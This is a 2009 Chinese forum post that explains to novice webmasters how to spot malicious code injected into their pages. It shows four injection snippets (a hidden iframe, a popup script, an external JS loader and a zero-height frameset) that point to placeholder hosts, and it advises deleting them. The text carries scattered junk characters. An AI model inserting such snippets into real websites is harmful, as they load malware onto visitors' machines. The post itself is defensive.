广西经贸职业技术学院论坛

标题: [建站技术]怎样发现自已站点被挂马 [打印本页]
作者: 月中水    时间: 2009-10-16 01:36
标题: [建站技术]怎样发现自已站点被挂马
现在有很多的网民正慢慢步入站长的行列,加之现在的网上的自助建站系统及CMS系统有很多,只要想建站稍微懂得一些HTML语言就开始了自已的建站生涯,可是这样的小站长对现在的互联网世界还是不太了解,一心想在网上捞到自已人生中的第一桶金,可却不是那么的容易,现在的互联网不像过去的2003年,成就了多少网络英雄?
8 H+ a4 v! Q) w; h  今天我本来没有打算写这篇文章的,看到我所在的一些站长群的很多小站长经常在问我的网站被挂马了,不知道怎么办!我的网站被挂马了,我的流量跌得历害,要怎么办等的求助语,刚好我也刚刚在网上知道了网页挂马的一些知识,所以在此发表一下,让不懂的小站长学习学习。3 s/ H& }5 U' _1 V" b( _5 m6 g
网页挂码有三种方式,具体怎么挂的,我就不多说了,网页被挂码的时候,HTML会混乱,造成前台首页参差不齐,被挂网页的网码一般有以下四种:% r( `: w- s1 F* a$ p1 S
一:% D# E0 B+ c! [" L
<iframe src="网马的地址" width="0" height="0" frameborder="0"></iframe>,“width="0" height="0" frameborder="0"就是大小高度的意思”这样被挂马的网页上就不会显示出来。
6 b3 N$ b1 H' V: j; j% a% U& L( n0 E
5 c3 @! u2 g6 Y4 K  c: K- h/ ?二:脚本挂马$ `. l3 ]7 p3 o# z0 x5 g
$ ~* r  W+ I9 q  M8 N- n
<SCRIPT language=javascript>
& v" |2 u# L$ B# s  S  Cwindow.open("http://www.xxx.com/test.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
: l1 Q* \( h8 s" I</script>1 W5 W  u4 a: B( J% S' Q& P0 h+ N
/ A3 ~) j+ ?6 P" |  G/ A  Y
三:这一点就是比较隐蔽的那就是使用js文件,代码如下:
  ^9 R# z/ m+ b<script language="javascript" src="</script'>http://xxxxxxx.net/mm.js"></script>这种呢,是很难发现被挂码,但是容易造成HTML混乱% S8 P8 L4 k7 j0 F  k  T

+ p- s$ q  l; b, s四:再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件,代码如下:
. |2 L+ u' ^- Q$ a/ m# p<frameset rows="444,0" cols="*">
. q( j1 c- d* O( s<frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">9 U+ L1 `. p- O6 b! j
<frame src="help.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">+ t: l! v& o4 B: r
</frameset>8 y- f2 Y& [( t9 R; \
  以上是被挂码的时候网页上会存在以上代码,那如果在检查网页是否被挂马时看到这些代码就可以证明有无挂马的现象了,发现网页被挂马就把以上代码中的任一代码删除然后保存即可。



欢迎光临 广西经贸职业技术学院论坛 (http://www.gxjmbbs.com/) Powered by Discuz! X3.2